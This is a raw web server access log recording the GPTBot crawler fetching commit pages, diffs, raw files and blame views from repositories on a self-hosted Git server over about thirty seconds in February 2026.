+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" -[17/Feb/2026:13:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" -[17/Feb/2026:13:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 14229] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 14743] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 15330] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" [Client 74.7.227.38] [Length 10107] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" -[17/Feb/2026:13:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 15169] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 10086] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:13:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 11528] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 11499] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" -[17/Feb/2026:13:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 12716] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" -[17/Feb/2026:13:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity" [Client 74.7.227.38] [Length 8364] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:13:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects" [Client 74.7.227.38] [Length 7755] [Gzip 2.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:13:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/releases" [Client 74.7.227.38] [Length 7404] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:13:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 10985] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 11394] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" -[17/Feb/2026:13:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" [Client 74.7.227.38] [Length 7492] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/branches" [Client 74.7.227.38] [Length 10353] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/watchers" [Client 74.7.227.38] [Length 7727] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:13:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" -[17/Feb/2026:13:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" -[17/Feb/2026:13:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 12416] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" -[17/Feb/2026:13:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" -[17/Feb/2026:13:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/releases.rss" [Client 74.7.227.38] [Length 352] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/releases" -[17/Feb/2026:13:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" -[17/Feb/2026:13:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 10893] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:13:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 19735] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:13:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 9996] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" -[17/Feb/2026:13:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" [Client 74.7.227.38] [Length 9920] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/.gitignore" -[17/Feb/2026:13:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:13:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03.diff" [Client 74.7.227.38] [Length 16885] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03.patch" [Client 74.7.227.38] [Length 17464] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook" [Client 74.7.227.38] [Length 52283] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" -[17/Feb/2026:13:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426.patch" [Client 74.7.227.38] [Length 2419] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones" [Client 74.7.227.38] [Length 8438] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:13:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" -[17/Feb/2026:13:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" -[17/Feb/2026:13:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 22474] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" -[17/Feb/2026:13:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" -[17/Feb/2026:13:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" [Client 74.7.227.38] [Length 9942] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/README.md" -[17/Feb/2026:13:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/main.py" -[17/Feb/2026:13:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 61126] [Gzip 57.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" -[17/Feb/2026:13:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 14935] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d.diff" [Client 74.7.227.38] [Length 361] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.diff" [Client 74.7.227.38] [Length 3101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" -[17/Feb/2026:13:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2.patch" [Client 74.7.227.38] [Length 3512] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" -[17/Feb/2026:13:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" -[17/Feb/2026:13:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10961] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29882] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 15888] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" [Client 74.7.227.38] [Length 11651] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 7497] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor" [Client 74.7.227.38] [Length 12586] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" 